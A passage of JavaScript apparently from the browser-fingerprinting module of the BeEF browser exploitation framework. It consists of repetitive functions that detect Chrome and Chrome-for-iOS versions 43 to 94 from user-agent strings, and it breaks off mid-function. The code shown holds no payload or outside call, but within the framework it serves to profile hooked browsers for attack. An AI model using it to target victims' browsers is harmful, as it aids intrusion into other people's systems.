* @example: beef.browser.isC43iOS()
isC43iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 43) ? true : false);
* Returns true if Chrome 44.
* @example: beef.browser.isC44()
isC44: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 44) ? true : false);
* Returns true if Chrome for iOS 44.
* @example: beef.browser.isC44iOS()
isC44iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 44) ? true : false);
* Returns true if Chrome 45.
* @example: beef.browser.isC45()
isC45: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 45) ? true : false);
* Returns true if Chrome for iOS 45.
* @example: beef.browser.isC45iOS()
isC45iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 45) ? true : false);
* Returns true if Chrome 46.
* @example: beef.browser.isC46()
isC46: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 46) ? true : false);
* Returns true if Chrome for iOS 46.
* @example: beef.browser.isC46iOS()
isC46iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 46) ? true : false);
* Returns true if Chrome 47.
* @example: beef.browser.isC47()
isC47: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 47) ? true : false);
* Returns true if Chrome for iOS 47.
* @example: beef.browser.isC47iOS()
isC47iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 47) ? true : false);
* Returns true if Chrome 48.
* @example: beef.browser.isC48()
isC48: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 48) ? true : false);
* Returns true if Chrome for iOS 48.
* @example: beef.browser.isC48iOS()
isC48iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 48) ? true : false);
* Returns true if Chrome 49.
* @example: beef.browser.isC49()
isC49: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 49) ? true : false);
* Returns true if Chrome for iOS 49.
* @example: beef.browser.isC49iOS()
isC49iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 49) ? true : false);
* Returns true if Chrome 50.
* @example: beef.browser.isC50()
isC50: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 50) ? true : false);
* Returns true if Chrome for iOS 50.
* @example: beef.browser.isC50iOS()
isC50iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 50) ? true : false);
* Returns true if Chrome 51.
* @example: beef.browser.isC51()
isC51: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 51) ? true : false);
* Returns true if Chrome for iOS 51.
* @example: beef.browser.isC51iOS()
isC51iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 51) ? true : false);
* Returns true if Chrome 52.
* @example: beef.browser.isC52()
isC52: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 52) ? true : false);
* Returns true if Chrome for iOS 52.
* @example: beef.browser.isC52iOS()
isC52iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 52) ? true : false);
* Returns true if Chrome 53.
* @example: beef.browser.isC53()
isC53: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 53) ? true : false);
* Returns true if Chrome for iOS 53.
* @example: beef.browser.isC53iOS()
isC53iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 53) ? true : false);
* Returns true if Chrome 54.
* @example: beef.browser.isC54()
isC54: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 54) ? true : false);
* Returns true if Chrome for iOS 54.
* @example: beef.browser.isC54iOS()
isC54iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 54) ? true : false);
* Returns true if Chrome 55.
* @example: beef.browser.isC55()
isC55: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 55) ? true : false);
* Returns true if Chrome for iOS 55.
* @example: beef.browser.isC55iOS()
isC55iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 55) ? true : false);
* Returns true if Chrome 56.
* @example: beef.browser.isC56()
isC56: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 56) ? true : false);
* Returns true if Chrome for iOS 56.
* @example: beef.browser.isC56iOS()
isC56iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 56) ? true : false);
* Returns true if Chrome 57.
* @example: beef.browser.isC57()
isC57: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 57) ? true : false);
* Returns true if Chrome for iOS 57.
* @example: beef.browser.isC57iOS()
isC57iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 57) ? true : false);
* Returns true if Chrome 58.
* @example: beef.browser.isC58()
isC58: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 58) ? true : false);
* Returns true if Chrome for iOS 58.
* @example: beef.browser.isC58iOS()
isC58iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 58) ? true : false);
* Returns true if Chrome 59.
* @example: beef.browser.isC59()
isC59: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 59) ? true : false);
* Returns true if Chrome for iOS 59.
* @example: beef.browser.isC59iOS()
isC59iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 59) ? true : false);
* Returns true if Chrome 60.
* @example: beef.browser.isC60()
isC60: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 60) ? true : false);
* Returns true if Chrome for iOS 60.
* @example: beef.browser.isC60iOS()
isC60iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 60) ? true : false);
* Returns true if Chrome 61.
* @example: beef.browser.isC61()
isC61: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 61) ? true : false);
* Returns true if Chrome for iOS 61.
* @example: beef.browser.isC61iOS()
isC61iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 61) ? true : false);
* Returns true if Chrome 62.
* @example: beef.browser.isC62()
isC62: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 62) ? true : false);
* Returns true if Chrome for iOS 62.
* @example: beef.browser.isC62iOS()
isC62iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 62) ? true : false);
* Returns true if Chrome 63.
* @example: beef.browser.isC63()
isC63: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 63) ? true : false);
* Returns true if Chrome for iOS 63.
* @example: beef.browser.isC63iOS()
isC63iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 63) ? true : false);
* Returns true if Chrome 64.
* @example: beef.browser.isC64()
isC64: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 64) ? true : false);
* Returns true if Chrome for iOS 64.
* @example: beef.browser.isC64iOS()
isC64iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 64) ? true : false);
* Returns true if Chrome 65.
* @example: beef.browser.isC65()
isC65: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 65) ? true : false);
* Returns true if Chrome for iOS 65.
* @example: beef.browser.isC65iOS()
isC65iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 65) ? true : false);
* Returns true if Chrome 66.
* @example: beef.browser.isC66()
isC66: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 66) ? true : false);
* Returns true if Chrome for iOS 66.
* @example: beef.browser.isC66iOS()
isC66iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 66) ? true : false);
* Returns true if Chrome 67.
* @example: beef.browser.isC67()
isC67: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 67) ? true : false);
* Returns true if Chrome for iOS 67.
* @example: beef.browser.isC67iOS()
isC67iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 67) ? true : false);
* Returns true if Chrome 68.
* @example: beef.browser.isC68()
isC68: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 68) ? true : false);
* Returns true if Chrome for iOS 68.
* @example: beef.browser.isC68iOS()
isC68iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 68) ? true : false);
* Returns true if Chrome 69.
* @example: beef.browser.isC69()
isC69: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 69) ? true : false);
* Returns true if Chrome for iOS 69.
* @example: beef.browser.isC69iOS()
isC69iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 69) ? true : false);
* Returns true if Chrome 70.
* @example: beef.browser.isC70()
isC70: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 70) ? true : false);
* Returns true if Chrome for iOS 70.
* @example: beef.browser.isC70iOS()
isC70iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 70) ? true : false);
* Returns true if Chrome 71.
* @example: beef.browser.isC71()
isC71: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 71) ? true : false);
* Returns true if Chrome for iOS 71.
* @example: beef.browser.isC71iOS()
isC71iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 71) ? true : false);
* Returns true if Chrome 72.
* @example: beef.browser.isC72()
isC72: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 72) ? true : false);
* Returns true if Chrome for iOS 72.
* @example: beef.browser.isC72iOS()
isC72iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 72) ? true : false);
* Returns true if Chrome 73.
* @example: beef.browser.isC73()
isC73: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 73) ? true : false);
* Returns true if Chrome for iOS 73.
* @example: beef.browser.isC73iOS()
isC73iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 73) ? true : false);
* Returns true if Chrome 74.
* @example: beef.browser.isC74()
isC74: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 74) ? true : false);
* Returns true if Chrome for iOS 74.
* @example: beef.browser.isC74iOS()
isC74iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 74) ? true : false);
* Returns true if Chrome 75.
* @example: beef.browser.isC75()
isC75: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 75) ? true : false);
* Returns true if Chrome for iOS 75.
* @example: beef.browser.isC75iOS()
isC75iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 75) ? true : false);
* Returns true if Chrome 76.
* @example: beef.browser.isC76()
isC76: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 76) ? true : false);
* Returns true if Chrome for iOS 76.
* @example: beef.browser.isC76iOS()
isC76iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 76) ? true : false);
* Returns true if Chrome 77.
* @example: beef.browser.isC77()
isC77: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 77) ? true : false);
* Returns true if Chrome for iOS 77.
* @example: beef.browser.isC77iOS()
isC77iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 77) ? true : false);
* Returns true if Chrome 78.
* @example: beef.browser.isC78()
isC78: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 78) ? true : false);
* Returns true if Chrome for iOS 78.
* @example: beef.browser.isC78iOS()
isC78iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 78) ? true : false);
* Returns true if Chrome 79.
* @example: beef.browser.isC79()
isC79: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 79) ? true : false);
* Returns true if Chrome for iOS 79.
* @example: beef.browser.isC79iOS()
isC79iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 79) ? true : false);
* Returns true if Chrome 80.
* @example: beef.browser.isC80()
isC80: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 80) ? true : false);
* Returns true if Chrome for iOS 80.
* @example: beef.browser.isC80iOS()
isC80iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 80) ? true : false);
* Returns true if Chrome 81.
* @example: beef.browser.isC81()
isC81: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 81) ? true : false);
* Returns true if Chrome for iOS 81.
* @example: beef.browser.isC81iOS()
isC81iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 81) ? true : false);
* Returns true if Chrome 82.
* @example: beef.browser.isC82()
isC82: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 82) ? true : false);
* Returns true if Chrome for iOS 82.
* @example: beef.browser.isC82iOS()
isC82iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 82) ? true : false);
* Returns true if Chrome 83.
* @example: beef.browser.isC83()
isC83: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 83) ? true : false);
* Returns true if Chrome for iOS 83.
* @example: beef.browser.isC83iOS()
isC83iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 83) ? true : false);
* Returns true if Chrome 84.
* @example: beef.browser.isC84()
isC84: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 84) ? true : false);
* Returns true if Chrome for iOS 84.
* @example: beef.browser.isC84iOS()
isC84iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 84) ? true : false);
* Returns true if Chrome 85.
* @example: beef.browser.isC85()
isC85: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 85) ? true : false);
* Returns true if Chrome for iOS 85.
* @example: beef.browser.isC85iOS()
isC85iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 85) ? true : false);
* Returns true if Chrome 86.
* @example: beef.browser.isC86()
isC86: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 86) ? true : false);
* Returns true if Chrome for iOS 86.
* @example: beef.browser.isC86iOS()
isC86iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 86) ? true : false);
* Returns true if Chrome 87.
* @example: beef.browser.isC87()
isC87: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 87) ? true : false);
* Returns true if Chrome for iOS 87.
* @example: beef.browser.isC87iOS()
isC87iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 87) ? true : false);
* Returns true if Chrome 88.
* @example: beef.browser.isC88()
isC88: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 88) ? true : false);
* Returns true if Chrome for iOS 88.
* @example: beef.browser.isC88iOS()
isC88iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 88) ? true : false);
* Returns true if Chrome 89.
* @example: beef.browser.isC89()
isC89: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 89) ? true : false);
* Returns true if Chrome for iOS 89.
* @example: beef.browser.isC89iOS()
isC89iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 89) ? true : false);
* Returns true if Chrome 90.
* @example: beef.browser.isC90()
isC90: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 90) ? true : false);
* Returns true if Chrome for iOS 90.
* @example: beef.browser.isC90iOS()
isC90iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 90) ? true : false);
* Returns true if Chrome 91.
* @example: beef.browser.isC91()
isC91: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 91) ? true : false);
* Returns true if Chrome for iOS 91.
* @example: beef.browser.isC91iOS()
isC91iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 91) ? true : false);
* Returns true if Chrome 92.
* @example: beef.browser.isC92()
isC92: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 92) ? true : false);
* Returns true if Chrome for iOS 92.
* @example: beef.browser.isC92iOS()
isC92iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 92) ? true : false);
* Returns true if Chrome 93.
* @example: beef.browser.isC93()
isC93: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 93) ? true : false);
* Returns true if Chrome for iOS 93.
* @example: beef.browser.isC93iOS()
isC93iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 93) ? true : false);
* Returns true if Chrome 94.
* @example: beef.browser.isC94()
isC94: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 94) ? true : false);
* Returns true if Chrome for iOS 94.
* @example: beef.browser.isC94iOS()
isC94iOS: function () {
